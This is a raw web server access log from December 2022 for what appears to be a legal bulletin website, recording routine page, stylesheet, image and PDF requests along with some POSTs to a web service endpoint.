201.245.192.253 - - [21/Dec/2022:07:30:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42490
201.245.192.253 - - [21/Dec/2022:07:30:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40456
201.245.192.253 - - [21/Dec/2022:07:32:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:07:33:40 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.212 - - [21/Dec/2022:07:34:24 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [21/Dec/2022:07:33:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:07:34:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51248
201.245.192.253 - - [21/Dec/2022:07:37:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
5.255.253.152 - - [21/Dec/2022:07:38:23 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:07:38:27 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [21/Dec/2022:07:38:27 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [21/Dec/2022:07:38:27 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [21/Dec/2022:07:38:27 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [21/Dec/2022:07:38:27 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [21/Dec/2022:07:38:27 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [21/Dec/2022:07:38:27 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [21/Dec/2022:07:38:27 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [21/Dec/2022:07:38:27 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [21/Dec/2022:07:38:27 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [21/Dec/2022:07:38:27 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [21/Dec/2022:07:38:27 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [21/Dec/2022:07:38:29 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [21/Dec/2022:07:38:36 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [21/Dec/2022:07:38:36 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [21/Dec/2022:07:38:36 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [21/Dec/2022:07:38:36 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
216.245.221.92 - - [21/Dec/2022:07:38:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:07:38:40 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2840&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 1097
172.22.2.4 - - [21/Dec/2022:07:38:40 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
201.245.192.253 - - [21/Dec/2022:07:38:43 -0500] "GET /BLA/resoluciones/AUTOS%202017/2840.pdf HTTP/1.1" 200 404396
201.245.192.253 - - [21/Dec/2022:07:38:43 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
